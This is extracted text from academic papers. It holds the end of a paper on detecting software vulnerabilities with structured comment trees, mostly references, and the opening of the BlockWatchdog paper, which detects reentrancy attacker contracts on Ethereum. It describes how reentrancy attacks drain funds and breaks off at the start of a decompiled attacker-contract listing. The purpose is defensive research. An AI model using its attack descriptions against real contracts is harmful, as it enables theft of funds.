text
stringlengths
64
2.99M
andChatGPTarecapableofproducingeffectivecommentsforthe language-reference?view=msvc-170 construction of SCTs. Specifically, the SCTs created by GPT3.5- [2] 2023.CVE. https://cve.mitre.org/ [3] 2023.OpenAI. https://platform.openai.com/docs/guides/gptbest-practices instructdemonstratedanenhancementinPrecisionandF1score, [4] 2023.Qemu. https://www.qemu.org/ showingimprovementof5.49%and1.98%,respectively,overthe [5] 2023.Tree-sitter. https://tree-sitter.github.io/tree-sitter/ [6] [n.d.].RoughAuditToolforSecurity. https://code.google.com/archive/p/rough- best-performingbaselineCodeT5,asshowninTable3.Inacom- auditing-tool-for-security. parativeanalysiswithSCTsgeneratedbyChatGPT,theGPT3.5- [7] RobertoBaldoni,EmilioCoppa,DanieleConoD’Elia,CamilDemetrescu,and instruct’sresultsarecomparablyeffective.Theyexhibitsuperiority IreneFinocchi.2018.ASurveyofSymbolicExecutionTechniques.ACMComput. Surv.51,3(2018),50:1–50:39. inrecallandF1score,whereasChatGPToutperformsinaccuracy [8] TomBrown,BenjaminMann,NickRyder,MelanieSubbiah,JaredDKaplan, andprecisionmetrics. PrafullaDhariwal,ArvindNeelakantan,PranavShyam,GirishSastry,Amanda Thesefindingssuggestthatemployingdifferentlargelanguage Askell,etal.2020.LanguageModelsareFew-ShotLearners.InAdvancesinNeural InformationProcessingSystems33:AnnualConferenceonNeuralInformation models(LLMs)forcommentgenerationonsourcecodeaidsinim- ProcessingSystems2020,NeurIPS2020,December6-12,2020,virtual. provingthepre-trainedmodel’scomprehension,therebyenhancing [9] SicongCao,XiaobingSun,LiliBo,YingWei,andBinLi.2021. BGNN4VD: ConstructingBidirectionalGraphNeural-NetworkforVulnerabilityDetection. theeffectivenessofvulnerabilitydetection. Inf.Softw.Technol.136(2021),106576. [10] SaikatChakraborty,RahulKrishna,YangruiboDing,andBaishakhiRay.2020. Deep Learning based Vulnerability Detection: Are We There Yet? CoRR 6.2 ThreattoValidity abs/2009.07235(2020). [11] ChatGPT.2022.ChatGPT.https://chat.openai.com/. GeneralizabilityonOtherProgrammingLanguages.Inthispaper,we [12] Chun-Fu(Richard)Chen,QuanfuFan,andRameswarPanda.2021. CrossViT: employthetree-sitterlibrarytoparseASTsforC/C++programming Cross-AttentionMulti-ScaleVisionTransformerforImageClassification.In2021 IEEE/CVFInternationalConferenceonComputerVision,ICCV2021,Montreal,QC, languages.Asaresult,ourexperimentalanalysisfocusessolelyon Canada,October10-17,2021.IEEE,347–356. C/C++datasets,excludingotherpopularlanguagessuchasJava [13] XiaoCheng,XuNie,NingkeLi,HaoyuWangandZhengZheng,andYuleiSui. 2022. HowAboutBug-TriggeringPaths?-UnderstandingandCharacterizing andPython.Infutureresearch,weintendtoevaluatetheefficacyof Learning-BasedVulnerabilityDetectors.IEEETransactionsonDependableand SCALEinthecontextofabroaderrangeofprogramminglanguages. SecureComputing. ConstraintsofDomainKnowledgeinStructuredNaturalLanguage [14] RolandCroft,MuhammadAliBabar,andM.MehdiKholoosi.2023.DataQuality forSoftwareVulnerabilityDatasets.CoRRabs/2301.05456(2023). Rules.ForthecontextofC/C++languagereference,SCALEoffers [15] Pieter-TjerkdeBoer,DirkP.Kroese,ShieMannor,andReuvenY.Rubinstein. elevenstructurednaturallanguagerulestofacilitatethecorrelation 2005. ATutorialontheCross-EntropyMethod. Ann.Oper.Res.134,1(2005), betweencodeanditsassociatedcomments.Althoughitiscompre- 19–67. [16] Facebook.[n.d.].Infer. https://fbinfer.com/. hensiveenoughinmostcases,itstillcannotcoversomestatements, [17] JiahaoFan,YiLi,ShaohuaWang,andTienN.Nguyen.2020. AC/C++Code suchasexpressionstatements.Thislimitationcouldpotentially VulnerabilityDatasetwithCodeChangesandCVESummaries.InMSR’20: 17thInternationalConferenceonMiningSoftwareRepositories,Seoul,Republicof introducebiasesintothemodel’spredictions.Apotentialresolution Korea,29-30June,2020,SunghunKim,GeorgiosGousios,SarahNadi,andJoseph tothisissuecouldinvolvemoretypesofASTnodestobroaden Hejderup(Eds.).ACM,508–512. the structured natural language rules, thereby enabling a more [18] ZhangyinFeng,DayaGuo,DuyuTang,NanDuan,XiaochengFeng,MingGong, LinjunShou,BingQin,TingLiu,DaxinJiang,andMingZhou.2020.CodeBERT: thoroughintegrationofcommentinformation. APre-TrainedModelforProgrammingandNaturalLanguages.InFindingsof Experimentsonthelargerpre-trainedmodel.Inthisexperiment, theAssociationforComputationalLinguistics:EMNLP2020,OnlineEvent,16-20 weevaluateSCALEonthreepre-trainedmodels.Thesemodelsare November2020(FindingsofACL,Vol.EMNLP2020),TrevorCohn,YulanHe,and YangLiu(Eds.).AssociationforComputationalLinguistics,1536–1547. allrepresentativeandhaveshownstate-of-the-artperformanceon [19] DanielFried,ArmenAghajanyan,JessyLin,SidaWang,EricWallace,FredaShi,
benchmarks.However,thesizeofthesemodelsislessthan1B.In RuiqiZhong,Wen-tauYih,LukeZettlemoyer,andMikeLewis.2022.InCoder:A GenerativeModelforCodeInfillingandSynthesis.CoRRabs/2204.05999(2022). thefuture,weplantovalidatetheeffectivenessofSCALEonlarger [20] MichaelFuandChakkritTantithamthavorn.2022.LineVul:ATransformer-based LLMssuchasCodeLlama[47]. Line-LevelVulnerabilityPrediction.InMSR.ACM,608–620.ISSTA2024,16-20September,2024,Vienna,Austria TrovatoandTobin,etal. [21] MichaelFu,ChakkritTantithamthavorn,VanNguyen,andTrungLe.2023.Chat- ProceedingsofDeepLearningInsideOut:The3rdWorkshoponKnowledgeExtraction GPTforVulnerabilityDetection,Classification,andRepair:HowFarAreWe? andIntegrationforDeepLearningArchitectures,DeeLIO@ACL2022,Dublin,Ireland CoRRabs/2310.09810(2023). andOnline,May27,2022.AssociationforComputationalLinguistics,100–114. [22] ShuzhengGao,WenxinMao,CuiyunGao,LiLi,XingHu,XinXia,andMichaelR. [41] ShuaiLu,DayaGuo,ShuoRen,JunjieHuang,AlexeySvyatkovskiy,Ambrosio Lyu.2024.LearningintheWild:TowardsLeveragingUnlabeledDataforEffec- Blanco,ColinB.Clement,DawnDrain,DaxinJiang,DuyuTang,GeLi,Lidong tivelyTuningPre-trainedCodeModels.CoRRabs/2401.01060(2024). Zhou,LinjunShou,LongZhou,MicheleTufano,MingGong,MingZhou,Nan [23] ShuzhengGao,Xin-ChengWen,CuiyunGao,WenxuanWang,HongyuZhang, Duan,NeelSundaresan,ShaoKunDeng,ShengyuFu,andShujieLiu.2021. andMichaelR.Lyu.2023. WhatMakesGoodIn-ContextDemonstrationsfor CodeXGLUE:AMachineLearningBenchmarkDatasetforCodeUnderstanding CodeIntelligenceTaskswithLLMs?.In38thIEEE/ACMInternationalConference andGeneration.InProceedingsoftheNeuralInformationProcessingSystemsTrack onAutomatedSoftwareEngineering,ASE2023,Luxembourg,September11-15,2023. onDatasetsandBenchmarks1,NeurIPSDatasetsandBenchmarks2021,December IEEE,761–773. 2021,virtual,JoaquinVanschorenandSai-KitYeung(Eds.). [24] GPT3.5-instruc.2022.GPT3.5-instruc.https://platform.openai.com/docs/models. [42] GaryMcGrawandBrucePotter.2004. SoftwareSecurityTesting. IEEESecur. [25] DayaGuo,ShuaiLu,NanDuan,YanlinWang,MingZhou,andJianYin.2022. Priv.2,5(2004),81–85. UniXcoder:UnifiedCross-ModalPre-trainingforCodeRepresentation.InPro- [43] ChaoNi,XinYin,KaiwenYang,DehaiZhao,ZhenchangXing,andXinXia.2023. ceedingsofthe60thAnnualMeetingoftheAssociationforComputationalLinguistics DistinguishingLook-AlikeInnocentandVulnerableCodebySubtleSemantic (Volume1:LongPapers),ACL2022,Dublin,Ireland,May22-27,2022,Smaranda RepresentationLearningandExplanation.CoRRabs/2308.11237(2023). Muresan,PreslavNakov,andAlineVillavicencio(Eds.).AssociationforCompu- [44] OpenAI.2023.GPT-4TechnicalReport.CoRRabs/2303.08774(2023). tationalLinguistics,7212–7225. [45] YunPeng,ChaozhengWang,WenxuanWang,CuiyunGao,andMichaelR.Lyu. [26] DayaGuo,ShuoRen,ShuaiLu,ZhangyinFeng,DuyuTang,ShujieLiu,Long 2023.GenerativeTypeInferenceforPython.CoRRabs/2307.09163(2023). Zhou,NanDuan,AlexeySvyatkovskiy,ShengyuFu,MicheleTufano,ShaoKun [46] BenPrystawskiandNoahD.Goodman.2023.Whythinkstep-by-step?Reasoning Deng,ColinB.Clement,DawnDrain,NeelSundaresan,JianYin,DaxinJiang, emergesfromthelocalityofexperience.CoRRabs/2304.03843(2023). andMingZhou.2021.GraphCodeBERT:Pre-trainingCodeRepresentationswith [47] BaptisteRozière,JonasGehring,FabianGloeckle,StenSootla,ItaiGat,Xi- DataFlow.In9thInternationalConferenceonLearningRepresentations,ICLR2021, aoqingEllenTan,YossiAdi,JingyuLiu,TalRemez,JérémyRapin,Artyom VirtualEvent,Austria,May3-7,2021.OpenReview.net. Kozhevnikov,IvanEvtimov,JoannaBitton,ManishBhatt,CristianCanton-Ferrer, [27] TongHe,WeilinHuang,YuQiao,andJianYao.2016.Text-AttentionalConvolu- AaronGrattafiori,WenhanXiong,AlexandreDéfossez,JadeCopet,FaisalAzhar, tionalNeuralNetworkforSceneTextDetection.IEEETrans.ImageProcess.25,6 HugoTouvron,LouisMartin,NicolasUsunier,ThomasScialom,andGabrielSyn- (2016),2529–2541. naeve.2023.CodeLlama:OpenFoundationModelsforCode.CoRRabs/2308.12950 [28] XinyiHou,YanjieZhao,YueLiu,ZhouYang,KailongWang,LiLi,XiapuLuo, (2023). DavidLo,JohnC.Grundy,andHaoyuWang.2023.LargeLanguageModelsfor [48] RebeccaL.Russell,LouisY.Kim,LeiH.Hamilton,TomoLazovich,JacobHarer, SoftwareEngineering:ASystematicLiteratureReview. CoRRabs/2308.10620 OnurOzdemir,PaulM.Ellingwood,andMarcW.McConley.2018.Automated (2023). VulnerabilityDetectioninSourceCodeUsingDeepRepresentationLearning.In [29] Huggingfacehub.2023.HuggingFace.https://huggingface.co/. ICMLA.IEEE,757–762.
[30] IBM.2023.CostofaDataBreachReport2023. https://www.ibm.com/reports/ [49] Statista.2023.CommonITvulnerabilitiesandexposuresworldwide2009-2023. data-breach https://www.statista.com/statistics/ [31] Israel.[n.d.].Checkmarx. https://www.checkmarx.com/. [50] YuleiSui,DingYe,andJinglingXue.2012.Staticmemoryleakdetectionusing [32] HongzheLi,TaebeomKim,MunkhbayarBat-Erdene,andHeejoLee.2013.Soft- full-sparsevalue-flowanalysis.InInternationalSymposiumonSoftwareTesting wareVulnerabilityDetectionUsingBackwardTraceAnalysisandSymbolic andAnalysis,ISSTA2012,Minneapolis,MN,USA,July15-20,2012,MatsPerErik Execution.In2013InternationalConferenceonAvailability,ReliabilityandSe- HeimdahlandZhendongSu(Eds.).ACM,254–264. curity,ARES2013,Regensburg,Germany,September2-6,2013.IEEEComputer [51] HugoTouvron,ThibautLavril,GautierIzacard,XavierMartinet,Marie-Anne Society,446–454. Lachaux,TimothéeLacroix,BaptisteRozière,NamanGoyal,EricHambro,Faisal [33] RaymondLi,LoubnaBenAllal,YangtianZi,NiklasMuennighoff,DenisKocetkov, Azhar,AurélienRodriguez,ArmandJoulin,EdouardGrave,andGuillaumeLam- ChenghaoMou,MarcMarone,ChristopherAkiki,JiaLi,JennyChim,QianLiu, ple.2023. LLaMA:OpenandEfficientFoundationLanguageModels. CoRR EvgeniiZheltonozhskii,TerryYueZhuo,ThomasWang,OlivierDehaene,Mishig abs/2302.13971(2023). Davaadorj,JoelLamy-Poirier,JoãoMonteiro,OlehShliazhko,NicolasGontier, [52] HugoTouvron,LouisMartin,KevinStone,PeterAlbert,AmjadAlmahairi,Yas- NicholasMeade,ArmelZebaze,Ming-HoYee,LogeshKumarUmapathi,Jian mineBabaei,NikolayBashlykov,SoumyaBatra,PrajjwalBhargava,ShrutiBhos- Zhu,BenjaminLipkin,MuhtashamOblokulov,ZhiruoWang,RudraMurthyV, ale,DanBikel,LukasBlecher,CristianCanton-Ferrer,MoyaChen,GuillemCucu- JasonStillerman,SivaSankalpPatel,DmitryAbulkhanov,MarcoZocca,Manan rull,DavidEsiobu,JudeFernandes,JeremyFu,WenyinFu,BrianFuller,Cynthia Dey,ZhihanZhang,NourMoustafa-Fahmy,UrvashiBhattacharyya,WenhaoYu, Gao,VedanujGoswami,NamanGoyal,AnthonyHartshorn,SagharHosseini, SwayamSingh,SashaLuccioni,PauloVillegas,MaximKunakov,FedorZhdanov, RuiHou,HakanInan,MarcinKardas,ViktorKerkez,MadianKhabsa,Isabel ManuelRomero,TonyLee,NadavTimor,JenniferDing,ClaireSchlesinger,Hailey Kloumann,ArtemKorenev,PunitSinghKoura,Marie-AnneLachaux,Thibaut Schoelkopf,JanEbert,TriDao,MayankMishra,AlexGu,JenniferRobinson, Lavril,JenyaLee,DianaLiskovich,YinghaiLu,YuningMao,XavierMartinet, CarolynJaneAnderson,BrendanDolan-Gavitt,DanishContractor,SivaReddy, TodorMihaylov,PushkarMishra,IgorMolybog,YixinNie,AndrewPoulton, DanielFried,DzmitryBahdanau,YacineJernite,CarlosMuñozFerrandis,Sean JeremyReizenstein,RashiRungta,KalyanSaladi,AlanSchelten,RuanSilva, Hughes,ThomasWolf,ArjunGuha,LeandrovonWerra,andHarmdeVries.2023. EricMichaelSmith,RanjanSubramanian,XiaoqingEllenTan,BinhTang,Ross StarCoder:maythesourcebewithyou!CoRRabs/2305.06161(2023). Taylor,AdinaWilliams,JianXiangKuan,PuxinXu,ZhengYan,IliyanZarov, [34] WenLi,HaipengCai,YuleiSui,andDavidManz.2020.PCA:memoryleakdetec- YuchenZhang,AngelaFan,MelanieKambadur,SharanNarang,AurélienRo- tionusingpartialcall-pathanalysis.InESEC/FSE’20:28thACMJointEuropean driguez,RobertStojnic,SergeyEdunov,andThomasScialom.2023. Llama2: SoftwareEngineeringConferenceandSymposiumontheFoundationsofSoftware OpenFoundationandFine-TunedChatModels.CoRRabs/2307.09288(2023). Engineering,VirtualEvent,USA,November8-13,2020,PremDevanbu,MyraB. [53] LilapatiWaikhomandRiponPatgiri.2023.Asurveyofgraphneuralnetworksin Cohen,andThomasZimmermann(Eds.).ACM,1621–1625. variouslearningparadigms:methods,applications,andchallenges.Artif.Intell. [35] YueLi,TianTan,AndersMøller,andYannisSmaragdakis.2018.Precision-guided Rev.56,7(2023),6295–6364. contextsensitivityforpointeranalysis.Proc.ACMProgram.Lang.2,OOPSLA [54] XiaomengWang,TaoZhang,RunpuWu,WeiXin,andChangyuHou.2018. (2018),141:1–141:29. CPGVA:CodePropertyGraphbasedVulnerabilityAnalysisbyDeepLearning. [36] YueLi,TianTan,AndersMøller,andYannisSmaragdakis.2020.APrincipled In10thInternationalConferenceonAdvancedInfocommTechnology,ICAIT2018, ApproachtoSelectiveContextSensitivityforPointerAnalysis. ACMTrans. Stockholm,Sweden,August12-15,2018.IEEE,184–188. Program.Lang.Syst.42,2(2020),10:1–10:40. [55] YueWang,WeishiWang,ShafiqR.Joty,andStevenC.H.Hoi.2021. CodeT5:
[37] YiLi,ShaohuaWang,andTienN.Nguyen.2021.Vulnerabilitydetectionwith Identifier-awareUnifiedPre-trainedEncoder-DecoderModelsforCodeUnder- fine-grainedinterpretations.InESEC/SIGSOFTFSE.ACM,292–303. standingandGeneration.InProceedingsofthe2021ConferenceonEmpirical [38] ZhenLi,DeqingZou,ShouhuaiXu,HaiJin,YaweiZhu,andZhaoxuanChen.2022. MethodsinNaturalLanguageProcessing,EMNLP2021,VirtualEvent/Punta SySeVR:AFrameworkforUsingDeepLearningtoDetectSoftwareVulnerabilities. Cana,DominicanRepublic,7-11November,2021,Marie-FrancineMoens,Xuanjing IEEETrans.DependableSecur.Comput.19,4(2022),2244–2258. Huang,LuciaSpecia,andScottWen-tauYih(Eds.).AssociationforComputational [39] ZhenLi,DeqingZou,ShouhuaiXu,XinyuOu,HaiJin,SujuanWang,Zhijun Linguistics,8696–8708. Deng,andYuyiZhong.2018.VulDeePecker:ADeepLearning-BasedSystemfor [56] JasonWei,XuezhiWang,DaleSchuurmans,MaartenBosma,BrianIchter,Fei VulnerabilityDetection.In25thAnnualNetworkandDistributedSystemSecurity Xia,EdH.Chi,QuocV.Le,andDennyZhou.2022.Chain-of-ThoughtPrompting Symposium,NDSS2018,SanDiego,California,USA,February18-21,2018.The ElicitsReasoninginLargeLanguageModels.InNeurIPS. InternetSociety. [57] Xin-ChengWen,YupanChen,CuiyunGao,HongyuZhang,JieM.Zhang,and [40] JiachangLiu,DinghanShen,YizheZhang,BillDolan,LawrenceCarin,and QingLiao.2023.VulnerabilityDetectionwithGraphSimplificationandEnhanced WeizhuChen.2022. WhatMakesGoodIn-ContextExamplesforGPT-3?.In GraphRepresentationLearning.In45thIEEE/ACMInternationalConferenceonSCALE:ConstructingStructuredNaturalLanguageCommentTreesforSoftwareVulnerabilityDetection ISSTA2024,16-20September,2024,Vienna,Austria SoftwareEngineering,ICSE2023,Melbourne,Australia,May14-20,2023.IEEE, IEEE/ACM44thInternationalConferenceonSoftwareEngineering,ICSE2022,Pitts- 2275–2286. burgh,PA,USA,May25-27,2022.ACM,2365–2376. [58] Xin-ChengWen,CuiyunGao,JiaxinYe,ZhihongTian,YanJia,andXuanWang. [63] JunweiZhang,ZhongxinLiu,XingHu,XinXia,andShanpingLi.2023.Vulnera- 2022. Meta-PathBasedAttentionalGraphLearningModelforVulnerability bilityDetectionbyLearningFromSyntax-BasedExecutionPathsofCode.IEEE Detection.CoRRabs/2212.14274(2022). Trans.SoftwareEng.49,8(2023),4196–4212. [59] Xin-ChengWen,XinchenWang,CuiyunGao,ShaohuaWang,YangLiu,and [64] QinkaiZheng,XiaoXia,XuZou,YuxiaoDong,ShanWang,YufeiXue,Zihan ZhaoquanGu.2023. WhenLessisEnough:PositiveandUnlabeledLearning Wang,LeiShen,AndiWang,YangLi,etal.2023. CodeGeeX:APre-Trained ModelforVulnerabilityDetection.(2023),345–357. ModelforCodeGenerationwithMultilingualEvaluationsonHumanEval-X. [60] DavidA.Wheeler.[n.d.].Flawfinder. https://dwheeler.com/flawfinder/ CoRRabs/2303.17568(2023). [61] FangWu,JigangWang,JiqiangLiu,andWeiWang.2017.Vulnerabilitydetection [65] YaqinZhou,ShangqingLiu,JingKaiSiow,XiaoningDu,andYangLiu.2019.De- withdeeplearning.In20173rdIEEEinternationalconferenceoncomputerand vign:EffectiveVulnerabilityIdentificationbyLearningComprehensiveProgram communications(ICCC).IEEE,1298–1302. SemanticsviaGraphNeuralNetworks.InAdvancesinNeuralInformationPro- [62] YuemingWu,DeqingZou,ShihanDou,WeiYang,DuoXu,andHaiJin.2022. cessingSystems32:AnnualConferenceonNeuralInformationProcessingSystems VulCNN:AnImage-inspiredScalableVulnerabilityDetectionSystem.In44th 2019,NeurIPS2019.10197–10207.
2403.19112 Uncover the Premeditated Attacks: Detecting Exploitable Reentrancy Vulnerabilities by Identifying Attacker Contracts ShuoYang JiachiChen∗ MingyuanHuang SunYat-senUniversity SunYat-senUniversity SunYat-senUniversity Zhuhai,China Zhuhai,China Zhuhai,China yangsh233@mail2.sysu.edu.cn chenjch86@mail.sysu.edu.cn huangmy83@mail2.sysu.edu.cn ZibinZheng YuanHuang SunYat-senUniversity SunYat-senUniversity Zhuhai,China Zhuhai,China zhzibin@mail.sysu.edu.cn huangyuan5@mail.sysu.edu.cn ABSTRACT KEYWORDS Reentrancy,anotoriousvulnerabilityinsmartcontracts,hasledto SmartContract;DataflowAnalysis;Reentrancy;AttackerIdentifi- millionsofdollarsinfinancialloss.However,currentsmartcontract cation;Ethereum vulnerabilitydetectiontoolssufferfromahighfalsepositiverate inidentifyingcontractswithreentrancyvulnerabilities.Moreover, ACMReferenceFormat: ShuoYang,JiachiChen,MingyuanHuang,ZibinZheng,andYuanHuang. onlyasmallportionofthedetectedreentrantcontractscanactually 2024.UncoverthePremeditatedAttacks:DetectingExploitableReentrancy beexploitedbyhackers,makingthesetoolslesseffectiveinsecuring VulnerabilitiesbyIdentifyingAttackerContracts.In2024IEEE/ACM46th theEthereumecosysteminpractice. InternationalConferenceonSoftwareEngineering(ICSE’24),April14–20, Inthispaper,weproposeBlockWatchdog,atoolthatfocuses 2024,Lisbon,Portugal.ACM,NewYork,NY,USA,12pages.https://doi.org/ ondetectingreentrancyvulnerabilitiesbyidentifyingattackercon- 10.1145/3597503.3639153 tracts.Theseattackercontractsaredeployedbyhackerstoexploit vulnerablecontractsautomatically.Byfocusingonattackercon- tracts,BlockWatchdogeffectivelydetectstrulyexploitablereen- 1 INTRODUCTION trancyvulnerabilitiesbyidentifyingreentrantcallflow.Addition- Inrecentyears,Ethereumhasexperiencedsignificantgrowthin ally,BlockWatchdogiscapableofdetectingnewtypesofreentrancy popularity and market cap [15], primarily due to its ability to vulnerabilitiescausedbypoordesignswhenusingERCtokensor supportawiderangeofdecentralizedapplications(DApps)[55], user-definedinterfaces,whichcannotbedetectedbycurrentrule- suchasdecentralizedfinance(DeFi)[53]andnon-fungibletokens basedtools.WeimplementBlockWatchdogusingcross-contract (NFTs)[57].Thisismadepossiblethroughtheuseofsmartcon- staticdataflowtechniquesbasedonattacklogicobtainedfroman tracts[59],whichareTuring-completeprogramsthatrunonthe empiricalstudythatanalyzesattackercontractsfrom281attack blockchain.However,asthevalueofEthereumcontinuestorise, incidents.BlockWatchdogisevaluatedon421,889Ethereumcon- attackersareincreasinglytargetingcontractswithvulnerabilities tractbytecodesandidentifies113attackercontractsthattarget159 that can be exploited to make unfair profits. Reentrancy is one victimcontracts,leadingtothetheftofEtherandtokensvalued oftheinfamousvulnerabilities,whichhascausedhugefinancial atapproximately908.6millionUSD.Notably,only18oftheiden- losses[60]sincethe150millionUSDDAOattackin2016[25],and tified159victimcontractscanbereportedbycurrentreentrancy newreentrancyattackskeeppoppingupinmoreandmorecomplex detectiontools. forms.Forexample,anattackerexploitedareentrancyvulnerability todrainapproximately1,300ETH(1.43millionUSD)fromtheNFT CCSCONCEPTS moneymarketplatformcalledOmni[1]byusingthehookfunction •Softwareanditsengineering→Softwareverificationand onERC721Received()declaredintheERC721standard[18]. validation. Numerousstudieshavefocusedondetectingvulnerabilitiesin smartcontracts[16,23,28],proposingvariousmethodssuchas staticanalysisanddynamictestingtoidentifypotentialissues.How- ∗correspondingauthor ever,theseworksfacetwomainlimitations.First,thereisahigh false-positiverateindetectingreentrancyvulnerabilities[60],as Permissiontomakedigitalorhardcopiesofallorpartofthisworkforpersonalor theycannotcorrectlydetectsomeprotectionpatterns.Furthermore, classroomuseisgrantedwithoutfeeprovidedthatcopiesarenotmadeordistributed forprofitorcommercialadvantageandthatcopiesbearthisnoticeandthefullcitation thesemethodsmainlyfocusonreentrancycausedbycall.value() onthefirstpage.Copyrightsforcomponentsofthisworkownedbyothersthanthe operations,whichcannotcovermorecomplexreentrancyvulner- author(s)mustbehonored.Abstractingwithcreditispermitted.Tocopyotherwise,or abilities(leadingtofalsenegatives)causedbypoordesignswhen republish,topostonserversortoredistributetolists,requirespriorspecificpermission and/orafee.Requestpermissionsfrompermissions@acm.org. usingstandardERCtokens,e.g.,ERC721,oruser-definedinterfaces ICSE2024,April2024,Lisbon,Portugal (seeSection2.2).Second,only2.68%ofcontractswithreentrancy ©2024Copyrightheldbytheowner/author(s).PublicationrightslicensedtoACM. vulnerabilitiescantrulybeexploitedbyhackers,andonly0.4%of ACMISBN979-8-4007-0217-4/24/04...$15.00 https://doi.org/10.1145/3597503.3639153 theEthersatstakecouldbeexploited[35].Real-worldattackers 4202 raM 82 ]RC.sc[
1v21191.3042:viXraICSE2024,April2024,Lisbon,Portugal ShuoYang,JiachiChen,MingyuanHuang,ZibinZheng,andYuanHuang intendtoevaluatethecostandbenefitofanattack,butmostcon- • WeevaluatetheperformanceofBlockWatchdogonadataset tractsdonothavethebalancethatcanbeextracted.Specifically, consistingof421,889contractsbytecode.Ourexperiments onEthereum,only3%ofthecontractshaveanon-zerobalance. showthatBlockWatchdogidentifies113attackercontracts Thus,mostofthevulnerablecontractslabeledbythetoolscannot and 159 victim contracts, which hold Ethers and tokens beexploitedandarefalsealarms,whichmakesitlesseffectivein worthapproximately908.6millionUSD.Only18ofthe159 securingtheEthereumecosysteminpractice. victimscanbedetectedbythecurrenttools.Wepublicizethe Exploitingreentrancyvulnerabilitiesrequiresdeployingmali- sourcecodeofBlockWatchdogandtheexperimentalresults ciouscontractsthatinitiatecallbackstothevictimcontract.Inthis inourrepository1. paper,weshiftourfocusfromvulnerabilitydetectiontoanalyzing attackercontracts.Toinvestigatehowattackersimplementcallback 2 BACKGROUNDANDMOTIVATION logiconvictims,weconductanempiricalstudybyanalyzing281 2.1 SoliditySmartContracts attackincidentreportsfromvariousplatforms,e.g.,Twitter[49], Asmartcontractisaself-executingagreementthatisenforcedby Medium[2],andPeckshield[34],spanningfromJune2016toJuly therulesencodedinitscode[46].Solidityisthemostpopularpro- 2022.Theseplatformsprovidecomprehensiveandtimelydescrip- gramminglanguageforsmartcontractsonEthereum.Thebytecode tionsofattackincidents,whicharealsoadoptedbyotherworks[57]. andtransactionsofthedeployedsmartcontractsarepermanently Consequently,wesummarizethreetypesofreentrancyattacktypes storedontheblockchain[59].Theimmutabilityofsmartcontracts basedonthefunctionsthatattackercontractsusedtomakecall- ensuresthattheircodeandbehaviorcannotbemodifiedoncede- backs(seeSection3).Furthermore,weproposeBlockWatchdog,a ployed,andtheyexecuteautomaticallybasedontheirpredefined toolthatutilizescross-contractstaticdataflowtechniquestoiden- logic.EthereumVirtualMachine(EVM)isastack-basedvirtual tifyreentrancyattackercontracts.First,BlockWatchdogdecompiles machinethatexecutestransactionsbysplittingtheEVMbytecode thecontract’sbytecodetotheintermediaterepresentation(IR)and intooperationcodes(opcodes)andfollowingtheirinstructions. extractsflowandexternalcallinformationinthefunctions.Sec- ond,BlockWatchdogidentifiesthecontractsinthecallchainand constructsthecross-contractcontrolflowgraph(xCFG)andthe 2.2 Reentrancy cross-contractcallgraph(xCG)ofthecontractbasedondataflow Thereentrancyvulnerabilityhasresultedinsignificantfinancial rules.Then,ittracesallcallchainstoperformataintanalysisto lossesoverthepastfewyears.Therearemanyworksthatfocus determinewhethertheattackercanmanipulatethecallchain,mak- ondetectingreentranciescausedbycall.value()pattern[60].So- ingitselfcalledagaintoimplementreentrancy.Basedondetection liditysmartcontractshaveauniquemechanismthatrequiresany patternsdesignedincollaborationwithexternalcallanddataflow contractthatreceivesEtherstoimplementafallbackfunction.The information,BlockWatchdogreportswhetherthecontractisan fallbackfunctionwillbeexecutedifthecontractreceivesEther attackercontractornotandidentifiesvulnerablevictimcontracts. fromotheraddresses.IfthevictimcontracttransfersEtherstothe Intheexperiment,wefirstevaluateBlockWatchdogonourcol- maliciousattackercontract,themaliciousonecantakeoverthe lectedground-truthdataset,whichcontains18reentrancyattacker controlflowandrepetitivelycallthevictiminitsfallbackfunction. contracts.Then,werunBlockWatchdogonareal-worlddatasetcon- Manyattackershaveexploitedthisfallbackmechanismtodrain taining421,889contracts’bytecodesobtainedbyreplayingtransac- fundsfromvictims.Notonlythosecausedbycall.value(),there tionsfromblocknumber10millionto15.5millionontheEthereum aresomenewreentrancytypes.Forexample,Lenf.me[24]and mainnet.Theaveragedetectiontimeofitis17.66seconds.Further- Omni[1]wereattackedbythebaddesignofusingERC777[14] more,BlockWatchdogidentifies249attackersmartcontractsinthis andERC721[18]tokens,respectively. dataset,and113ofthemarelabeledastruepositives.Amongthem, Inaddition,poordesignwhenusinguser-definedinterfacescan 40are0-dayattackercontracts,whichinvolve159victimcontracts. alsoleadtoreentrancyissues.Figure1showstheattackercontract Ethersandtokensworthapproximately908.6millionUSDinthese thathacked8.2millionUSDthroughareentrancyattackonIVi- contractshavebeenstolenbyattackers.Furthermore,werunseven sor[19],aliquiditymanagementprotocolofUniswapV3[51].The toolsforreentrancyvulnerabilitydetectiononidentifiedvictim functiondelegatedTransferERC20()(L25)isdefinedbythedevelop- contracts;only18(11.3%)ofthemcanbecorrectlyreported. ers,whichisnotdeclaredintheERCtokenstandard.Theattacker Themaincontributionsofourworkareasfollows. contractinjectsexternalcallsintothefunctiondelegatedTransfer- ERC20()(L13-L17)invokedbythevictimcontractRewardHypervisor
(L20).Indetail,theattackercontractinvokesthefunctiondeposit() • Weshiftthedetectionfocusfromvulnerablecontractsto (L8) of the contract RewardHypervisor. Then, RewardHypervisor attackercontracts,whichalleviatesthehighfalsepositive callsthedelegatedTransferERC20()(L25)ofcontractfrom,which problemandlimitedcapabilityofcurrenttoolsinfinding issetbytheattackercontractwithaddress(this),i.e.,theattacker reentrancy. contract itself (L25). However, the attacker makes a callback to • Wesummarizethreetypesofreentrancyattacksfromanem- RewardHypervisoragaintodepositagainonline8,whichmakes piricalstudyandintroduceBlockWatchdog,across-contract itsufferfromareentrancyvulnerability.ThecontractRewardsHy- staticdataflowanalysistooltofindattackercontractsand pervisordoesnotcontaincall.value()reentrancyvulnerabilitytype, vulnerablevictimcontractstheytarget.Additionally,Block- whichcurrentdetectiontoolsfocuson.Yet,itwasstillattackedby Watchdogisextensibleforuserstoprogrammorerulesto covernewattacktypes. 1https://github.com/shuo-young/BlockWatchdogUncoverthePremeditatedAttacks:DetectingExploitableReentrancyVulnerabilitiesbyIdentifyingAttackerContracts ICSE2024,April2024,Lisbon,Portugal themaliciousattackercontracttomakeunfairgainsduetothebad Furthermore,existingtoolscannotcovernewtypesofreentrancies designwhenusinguser-definedinterfacedelegatedTransferERC20(). causedbypoordesignwhenusingERCtokens,whichcanresult infalsenegatives.Thisisbecauserule-basedtoolshavelimited scalability,aseachrulecanonlycheckaspecificreentrancytype 1 // the decompiled IR of the attacker contract bytecode 2 contract Attacker { (e.g.,reentrancycausedbycall.value())andcannotcoveremerging 3 function 0x4a0b0c38() public payable { 